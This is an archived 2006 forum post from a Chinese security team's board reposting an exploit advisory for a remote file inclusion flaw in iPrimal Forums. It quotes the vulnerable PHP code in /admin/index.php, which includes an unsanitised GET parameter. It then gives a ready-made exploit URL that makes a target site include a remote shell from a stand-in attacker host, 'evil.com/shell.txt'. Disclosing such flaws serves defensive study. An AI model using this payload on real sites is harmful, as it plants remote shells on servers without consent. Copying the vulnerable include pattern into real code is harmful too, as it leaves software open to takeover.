邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-11-12 12:42

iPrimal Forums (admin/index.php) Remote File Include Vulnerability

[code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download:[url]http://ipigroup.org/downloads/forums.zip[/url]
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code:  #line 126-129
.....
if($_GET['p'] == ''){

echo 'Please select an item from the menu above.';

}else{

include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
[url]http://host.com/admin/index.php?p=http://evil.com/shell.txt?[/url]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!


[/code]

页: [1]
© 1999-2008 EvilOctal Security Team